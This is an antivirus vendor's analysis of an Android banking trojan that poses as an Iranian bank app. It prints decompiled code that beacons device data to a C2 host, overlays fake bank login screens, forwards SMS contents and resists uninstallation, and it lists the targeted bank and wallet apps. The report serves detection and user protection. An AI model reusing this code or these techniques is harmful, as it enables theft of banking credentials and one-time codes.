Overview
Type: Trojan
Destruction Level: Medium
Prevalence: Medium
Malware name(s)
- Trojan.Android.Banker.IR (Padvish)
- HEUR:Trojan-Banker.AndroidOS.GossRat.a (Kaspersky)
- A Variant Of Android/Spy.Banker.BZY (ESET)
What is a Trojan?
Trojan is a type of malware that disguises itself as cleaned and legitimate software and behaves totally like a useful and functional software.
But when executed, it causes a lot of damage to the computer system.
There are different ways in which trojans could enter the system, some are: Entering through a software downloaded from the Internet, embedding in HTML text, attaching to an email, etc.
What is the Banker malware family?
This malware family, which masquerades itself as banking, financial and other legitimate applications, is specifically deployed to steal banking, financial and sensitive information from Android devices. This type of malware can intercept sensitive information such as credit card information, banking login information, OTP codes, transaction details, etc.
Technical Review
Indicators of Compromise (IoC)
The malware is installed in the victim’s mobile phone and masquerades as Hamrah Bank Saderat (Banking application).
After running, it asks the user to grant access to read banking SMS and enabling the Accessibility Services license.
The main drawback of using the Accessibility license is that it obliges the user to grant this license and after obtaining it, it receives the following capabilities for abuse:
- Stealing online banking login information
- Stealing credit card information
- Access to user SMS to steal OTP codes
This malware is a Trojan of a new type of banking campaign that has targeted customers of some Iranian banks, including Bank Melli, Saderat, Pasargad, Sepah, etc. In addition to banking applications, it also threatens a number of cryptocurrency wallet applications.
Indicators of compromise
-
Request to enable the Accessibility Services license
-
Change system settings without user permission
✅ Main activity com.sadsad.newsdfg.appui.SplashActivity
In this activity, the malware deploys the following method to send some information to the malware’s C2 server address
“/https[:]//rat-Saderat[.]click/rat/gossiper.php”
This information includes: Android ID (phone ID), Android operating system version, the name of the user’s phone manufacturer and the installed version of the malware along with the list of installed application in the target list of the malware (a list of banking applications and cryptocurrency wallet, according to the table below).
public void gossiper(Response.Listener<Message> success, Response.ErrorListener errorListener) {
Type type = new TypeToken<Message>() { // from class: com.sadsad.newsdfg.api.ApiSender.3
}.getType();
HashMap hashMap = new HashMap();
hashMap.put(“android_id”, Util.getAndroidID(this.context));
hashMap.put(“device”, Build.MANUFACTURER + ” | ” + Build.MODEL + ” | ” + Build.VERSION.RELEASE);
hashMap.put(“version”, “8”);
try {
hashMap.put(“extra_data”, new Gson().toJson(Util.getAllApps(this.context)));
} catch (Exception unused) {
}
ApiRequest.instance(this.context).add(new GsonService(1, LINK.GOSSIPER(this.context), hashMap, success, errorListener, type));
}
- The package names and applications checked by the malware are as described in the following table:
Application name | Package Name |
---|---|
Bam |
ir.bmi.bam.nativeweb |
Hamrah Bank Mellat |
com.pmb.mobile |
Sepah MBanking |
mob.banking.android.sepah |
Hamrah Bank |
com.isc.bsinew |
blu |
com.samanpr.blu |
Pasargad MBanking |
mob.banking.android.pasargad |
Hamrah Shahr Plus |
com.citydi.hplus |
Hamrah Bank Tejarat |
ir.tejaratbank.tata.mobile.android.tejarat |
MetaMask |
io.metamask |
Digipay |
com.mydigipay.app.android |
Parsian Man |
com.parsmobapp |
Fantom fWallet |
network.fantom.fwallet |
Resalat MBanking |
mob.banking.android.resalat |
Up |
com.sibche.aspardproject.app |
SafePal |
io.safepal.wallet |
Nobitex |
market.nobitex |
Hamrah Novin |
com.farazpardazan.enbank |
Trust Wallet |
com.wallet.crypto.trustapp |
CoinEx |
com.coinex.trade.play |
Chrome |
com.android.chrome |
KuCoin |
com.kubi.kucoin |
Refah Bank Mobile |
com.refahbank.dpi.android |
Bitpin |
io.bitpin.app |
Hamrah card |
com.adpdigital.mbs.ayande |
Coinbase |
com.coinbase.android |
TronLink Pro |
com.tronlinkpro.wallet |
Tetherland |
land.tether.tetherland |
MathWallet |
com.mathwallet.android |
✅ com.sadsad.newsdfg.MyAccessibilityService Service
The malware in this service performs various tasks,: the management of accessibility events, the monitoring incoming SMS , control of accesses and behavior of the banking applications targeted by the malware, and the management of special features, especially in Samsung and Xiaomi devices.
The onAccessibilityEvent method is called upon receiving an access event and checks the package name of the active application and compares it with a list of banking application package names (BAM, MELLAT, SEPAH, SADERAT, BLUEBANK, PASARGAD, SHAHR, TEJARAT) targeted by the malware and If it matches, it will lunch the desired activity with the target bank to display to the user.
For example, the package name of Bank Mellat application is “com.pmb.mobile”, if it is in the target list of malware and also if the Bank Mellat application is not opened and more than 10 minutes have passed since the last time of use, the malware will lunch Bank Mellat activity (com.sadsad.newsdfg.activity.F_Mellat)
Next, if the user’s phone is “Samsung” or “Xiaomi”, in the case that malware does not have the permission to access the user’s SMS, it will automatically enables the permission to access the user’s SMS in the function GrantSMSPermission method using accessibility services.
Also, if it doesn’t have the Draw Over Other Apps permission (this permission allows apps to display their content on top of other apps and with higher priority than the apps running in the background), the malware tries to get this permission in the functionFindItemDrawOverLay method using accessibility services. Then, using the functionAvoidUninstallApp method, it prevents its removal from the user’s phone.
public void onAccessibilityEvent(AccessibilityEvent accessibilityEvent) {
AccessibilityNodeInfo source = accessibilityEvent.getSource();
if (source == null || source.getPackageName() == null) {
return;
}
Log.i(“rat_”, “p_>: ” + ((Object) source.getPackageName()));
if (Arrays.asList(Util.Apps.APPS).contains(((Object) source.getPackageName()) + “”)) {
String str = ((Object) source.getPackageName()) + “”;
str.hashCode();
char c = 65535;
switch (str.hashCode()) {
case -2100591472:
if (str.equals(Util.Apps.SEPAH)) {
c = 0;
break;
}
break;
case -1922768888:
if (str.equals(Util.Apps.BAM)) {
c = 1;
break;
}
break;
case -1535722223:
if (str.equals(Util.Apps.SHAHR)) {
c = 2;
break;
}
break;
case -1149263316:
if (str.equals(Util.Apps.PASARGAD)) {
c = 3;
break;
}
break;
case -764315848:
if (str.equals(Util.Apps.MELLAT)) {
c = 4;
break;
}
break;
case -211716598:
if (str.equals(Util.Apps.SADERAT)) {
c = 5;
break;
}
break;
case -99771380:
if (str.equals(Util.Apps.TEJARAT)) {
c = 6;
break;
}
break;
case 254313950:
if (str.equals(Util.Apps.BLUEBANK)) {
c = 7;
break;
}
break;
}
switch (c) {
case 0:
if (!ShareStorage.getInstance(this).isAppOpened(Util.Apps.SEPAH) && (System.currentTimeMillis() – ShareStorage.getInstance(this).lastSubmitTimeApp(Util.Apps.SEPAH)) / 1000 >= 600) {
ShareStorage.getInstance(this).setAppOpened(Util.Apps.SEPAH, true);
Intent intent = new Intent(this, F_SepahBank.class);
intent.setFlags(268435456);
startActivity(intent);
break;
}
break;
case 1:
if (!ShareStorage.getInstance(this).isAppOpened(Util.Apps.BAM) && (System.currentTimeMillis() – ShareStorage.getInstance(this).lastSubmitTimeApp(Util.Apps.BAM)) / 1000 >= 600) {
ShareStorage.getInstance(this).setAppOpened(Util.Apps.BAM, true);
Intent intent2 = new Intent(this, F_Bam.class);
intent2.setFlags(268435456);
startActivity(intent2);
break;
}
break;
case 2:
if (!ShareStorage.getInstance(this).isAppOpened(Util.Apps.SHAHR) && (System.currentTimeMillis() – ShareStorage.getInstance(this).lastSubmitTimeApp(Util.Apps.SHAHR)) / 1000 >= 600) {
ShareStorage.getInstance(this).setAppOpened(Util.Apps.SHAHR, true);
Intent intent3 = new Intent(this, F_ShahrBank.class);
intent3.setFlags(268435456);
startActivity(intent3);
break;
}
break;
case 3:
if (!ShareStorage.getInstance(this).isAppOpened(Util.Apps.PASARGAD) && (System.currentTimeMillis() – ShareStorage.getInstance(this).lastSubmitTimeApp(Util.Apps.PASARGAD)) / 1000 >= 600) {
ShareStorage.getInstance(this).setAppOpened(Util.Apps.PASARGAD, true);
Intent intent4 = new Intent(this, F_Pasargad.class);
intent4.setFlags(268435456);
startActivity(intent4);
break;
}
break;
case 4:
if (!ShareStorage.getInstance(this).isAppOpened(Util.Apps.MELLAT) && (System.currentTimeMillis() – ShareStorage.getInstance(this).lastSubmitTimeApp(Util.Apps.MELLAT)) / 1000 >= 600) {
ShareStorage.getInstance(this).setAppOpened(Util.Apps.MELLAT, true);
Intent intent5 = new Intent(this, F_Mellat.class);
intent5.setFlags(268435456);
startActivity(intent5);
break;
}
break;
case 5:
if (!ShareStorage.getInstance(this).isAppOpened(Util.Apps.SADERAT) && (System.currentTimeMillis() – ShareStorage.getInstance(this).lastSubmitTimeApp(Util.Apps.SADERAT)) / 1000 >= 600) {
ShareStorage.getInstance(this).setAppOpened(Util.Apps.SADERAT, true);
Intent intent6 = new Intent(this, F_Saderat.class);
intent6.setFlags(268435456);
startActivity(intent6);
break;
}
break;
case 6:
if (!ShareStorage.getInstance(this).isAppOpened(Util.Apps.TEJARAT) && (System.currentTimeMillis() – ShareStorage.getInstance(this).lastSubmitTimeApp(Util.Apps.TEJARAT)) / 1000 >= 600) {
ShareStorage.getInstance(this).setAppOpened(Util.Apps.TEJARAT, true);
Intent intent7 = new Intent(this, F_Tejarat.class);
intent7.setFlags(268435456);
startActivity(intent7);
break;
}
break;
case 7:
if (!ShareStorage.getInstance(this).isAppOpened(Util.Apps.BLUEBANK) && (System.currentTimeMillis() – ShareStorage.getInstance(this).lastSubmitTimeApp(Util.Apps.BLUEBANK)) / 1000 >= 600) {
ShareStorage.getInstance(this).setAppOpened(Util.Apps.BLUEBANK, true);
Intent intent8 = new Intent(this, F_BlueBank.class);
intent8.setFlags(268435456);
startActivity(intent8);
break;
}
break;
}
}
if (Build.MANUFACTURER.equalsIgnoreCase(“samsung”)) {
if (ShareStorage.STATE.STATE_ACCEPT_SMS_PERMISSION.equals(ShareStorage.getInstance(this).getState())) {
SamsungHandler.functionGrantSMSPermission(source, this, this.allowPermission);
} else if (ShareStorage.STATE.STATE_TRACK_DRAW_OVER_LAY.equals(ShareStorage.getInstance(this).getState())) {
SamsungHandler.functionFindItemDrawOverLay(this, source, this.appearOnTop, this.allowPermissionTop);
}
if (accessibilityEvent.getEventType() == 2048 && ShareStorage.getInstance(this).isAvoidUninstallApp()) {
SamsungHandler.functionAvoidUninstallApp(this, source, this.appName, this.appInfo, this.unInstall);
}
} else if (Build.MANUFACTURER.equalsIgnoreCase(“xiaomi”)) {
if (ShareStorage.STATE.STATE_ACCEPT_SMS_PERMISSION.equals(ShareStorage.getInstance(this).getState())) {
XiaomiHandler.functionGrantSMSPermission(source, this, this.allowXiaomiSMS, this.allowXiaomiSMS2, this.allowXiaomiSMS3);
} else if (ShareStorage.STATE.STATE_TRACK_DRAW_OVER_LAY.equals(ShareStorage.getInstance(this).getState())) {
XiaomiHandler.functionFindItemDrawOverLay(this, source, this.advanced, this.displayOverOtherApps, this.allowDisplayOverOtherApps);
}
if (accessibilityEvent.getEventType() == 2048 && ShareStorage.getInstance(this).isAvoidUninstallApp()) {
XiaomiHandler.functionAvoidUninstallApp(this, source, this.appName, this.appInfo, this.unInstall, this.uninstall_xiaomi_1, this.uninstall_xiaomi_2, this.accessibilityMenu, this.downloadedApps, this.downloadedServices);
}
}
}
The SMSBroadCast class is defined as a dynamic receiver inside the malware service. As soon as an SMS is received, it triggers the execution of the following method. Within this method, the content of the received SMS, along with the sender’s address and phone ID (Android ID), is transmitted to the malware server address “https[:]//rat-saderat[.]click/rat/sendData.php” using the sendDataToServer method.
public void onReceive(Context context, Intent intent) {
Bundle extras = intent.getExtras();
if (extras != null) {
String str = “”;
String str2 = “”;
for (Object obj : (Object[]) extras.get(“pdus”)) {
SmsMessage createFromPdu = SmsMessage.createFromPdu((byte[]) obj);
String str3 = createFromPdu.getMessageBody().toString();
str = createFromPdu.getOriginatingAddress();
str2 = str2 + str3;
}
sendDataToServer(context, str, str2, 0);
}
}
✅ com.sadsad.newsdfg.activity.F_Mellat activity
This activity is a simulation of the user’s login page to the Bank Mellat application. In some situation, if the user has installed the Bank Mellat mobile application on his phone, the malware displays this activity to the user, steals his banking information, and sends it to the malware C2 server.
In submitLogin method, the user’s inputted information, such as their mobile number, username, password for logging into the Bank Mellat application, and their phone ID, will be sent to “https[:]//rat-saderat[.]click/rat/sendLoginData.php”.
Malware Techniques
The Malware in “Samsung” phones uses functionAvoidUninstallApp method to prevent its removal from the user’s phone, and thus pave the way for its survival in the user’s phone. By using the accessibility service once the content of the user’s window is changed, the malware checks whether the package name of the running application includes one of the following or not, and if one of the following applications is running, it will exit this page by simulating the back button and prevent changes to be made to remove or stop the malware.
- com.samsung.accessibility” (system application related to the internal accessibility service of Samsung devices)
- “com.sec.android.app.launcher” (default system application launcher for Samsung devices)
- “com.google.android.packageinstaller” (system application designed to install and remove other applications)
- “com.android.settings” (system application related to basic settings for Android devices)
Malware in “Xiaomi” devices also prevents removing itself from the user’s phone with a similar operation.
How to deal with and clean the system?
To make sure that the device is not infected, install Padvish antivirus. Additionally, it is essential to regularly update its database and run antivirus scans.
How to prevent Phone’s infection?
- When installing application on mobile devices, pay attention to the requested permissions. If an applications asks for permissions unrelated to the application’s activity, especially the accessibility service permission, be careful using it.
- Keep your mobile device up to date, ideally enable automatic update.
- Make sure to download the required applications, especially banking applications, from legitimate bank websites or trusted application markets, and do not download applications from Telegram channels, Instagram, and untrustworthy websites.
- It is recommended not to click on suspicious links that are received through SMS.